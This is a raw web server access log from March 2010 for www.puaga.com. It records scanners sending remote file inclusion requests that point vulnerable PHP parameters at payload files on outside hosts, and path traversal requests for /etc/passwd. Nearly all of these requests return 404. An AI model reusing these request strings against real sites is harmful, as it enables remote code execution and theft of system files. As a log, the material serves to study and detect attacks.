200.78.235.181 - - [01/Mar/2010:10:54:52 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:54:52 -0800] "GET /logs/access_100221.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:55:07 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:55:10 -0800] "GET /logs/access_100221.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:55:10 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:55:14 -0800] "GET /logs/access_100129.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:55:38 -0800] "GET /logs/access_100129.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:56:55 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:56:59 -0800] "GET /logs/access_100130.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:59:05 -0800] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:59:43 -0800] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:59:43 -0800] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:59:43 -0800] "GET /logs/access_100221.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:11:00:03 -0800] "GET /logs/access_100129.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [01/Mar/2010:11:01:10 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [01/Mar/2010:11:01:10 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [01/Mar/2010:11:01:10 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
96.31.166.228 - - [01/Mar/2010:11:01:27 -0800] "GET / HTTP/1.1" 200 2392 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "pixero.net"
200.78.235.181 - - [01/Mar/2010:11:02:16 -0800] "GET /logs///index.php/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://paku1.fileave.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:11:02:17 -0800] "GET //index.php/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://paku1.fileave.com/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:11:02:19 -0800] "GET /logs/access_100212.log///index.php/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://paku1.fileave.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:11:04:45 -0800] "GET /logs/access_100119.log/home.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:11:04:45 -0800] "GET /home.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:11:04:45 -0800] "GET /logs/home.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
190.152.217.250 - - [01/Mar/2010:11:05:13 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [01/Mar/2010:11:05:13 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [01/Mar/2010:11:05:13 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [01/Mar/2010:11:06:04 -0800] "GET /logs/access_100207.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:11:07:11 -0800] "GET /board/bbs/delete_all.php?board_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:11:07:12 -0800] "GET /board/bbs/delete_all.php?board_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:11:08:30 -0800] "GET /logs//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:11:08:30 -0800] "GET /components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:11:08:33 -0800] "GET /logs/access_100221.log//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:11:08:49 -0800] "GET /bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:11:08:49 -0800] "GET /logs/access_100211.log%20%20//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:11:08:50 -0800] "GET /logs//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:11:12:55 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:11:12:55 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:11:13:27 -0800] "GET /appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:11:13:27 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:11:13:27 -0800] "GET /logs/access_100220.log%20%20//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:11:13:36 -0800] "GET /logs/access_100128.log%20%20//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:11:14:07 -0800] "GET /appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:11:14:07 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:11:14:07 -0800] "GET /logs/access_100220.log%20%20//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:11:14:15 -0800] "GET /logs/access_100128.log%20%20//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:14:25 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:14:25 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:14:27 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:14:27 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:14:27 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:14:29 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [01/Mar/2010:11:14:50 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.meuveiculonovo.com//includes/Cache/ts?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
193.111.95.42 - - [01/Mar/2010:11:14:50 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.meuveiculonovo.com//includes/Cache/ts?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:15:44 -0800] "GET /mainbody.php?option=com_custompages&cpage=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:15:44 -0800] "GET /logs/access_100119.log%20%20/mainbody.php?option=com_custompages&cpage=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:15:44 -0800] "GET /logs/mainbody.php?option=com_custompages&cpage=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:15:48 -0800] "GET /logs/access_100210.log%20%20/mainbody.php?option=com_custompages&cpage=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [01/Mar/2010:11:17:20 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [01/Mar/2010:11:17:20 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [01/Mar/2010:11:17:20 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:17:37 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:17:37 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [01/Mar/2010:11:17:45 -0800] "GET /logs/access_100220.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:18:16 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:18:16 -0800] "GET /logs/access_100218.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:18:16 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:18:36 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:18:36 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:18:40 -0800] "GET /logs/access_100218.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:41 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:41 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:41 -0800] "GET /logs/access_100128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:48 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:48 -0800] "GET /logs/access_100128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:48 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:53 -0800] "GET /logs/access_100208.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:53 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:53 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:54 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:54 -0800] "GET /logs/access_100208.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:19:54 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:20:03 -0800] "GET /logs/access_100208.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:20:09 -0800] "GET /logs/access_100208.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:20:27 -0800] "GET /logs//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:20:27 -0800] "GET /logs/access_100221.log%20%20//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:20:32 -0800] "GET /logs/access_100219.log%20%20//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:11:21:20 -0800] "GET /logs/access_100119.log%20%20/mainbody.php?option=com_custompages&cpage=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:11:21:20 -0800] "GET /mainbody.php?option=com_custompages&cpage=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:11:21:20 -0800] "GET /logs/mainbody.php?option=com_custompages&cpage=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:21:32 -0800] "GET /mainbody.php?option=com_custompages&cpage=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:11:21:33 -0800] "GET /logs/access_100210.log%20%20/mainbody.php?option=com_custompages&cpage=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:21:36 -0800] "GET /logs/access_100210.log%20%20/mainbody.php?option=com_custompages&cpage=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:22:33 -0800] "GET /private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:22:57 -0800] "GET /logs/access_100219.log%20%20//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.213 - - [01/Mar/2010:11:24:48 -0800] "GET /ideal/forum/viewtopic.php?p=20844 HTTP/1.1" 404 5258 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:24:53 -0800] "GET /logs/access_100221.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:11:25:37 -0800] "GET /logs/scripts.log//index.php?=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:11:26:32 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:27:49 -0800] "GET /logs/access_100221.log//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:27:54 -0800] "GET /logs/access_100219.log//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:27:55 -0800] "GET /skin/zero_vote/error.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:27:55 -0800] "GET /logs/access_100128.log%20%20//skin/zero_vote/error.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:27:55 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:28:09 -0800] "GET /logs/access_100206.log%20%20//skin/zero_vote/error.php?dir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:29:12 -0800] "GET /logs/access_100221.log//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [01/Mar/2010:11:29:16 -0800] "GET /logs/access_100205.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [01/Mar/2010:11:29:17 -0800] "GET /logs/access_100220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:29:17 -0800] "GET /logs/access_100219.log//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
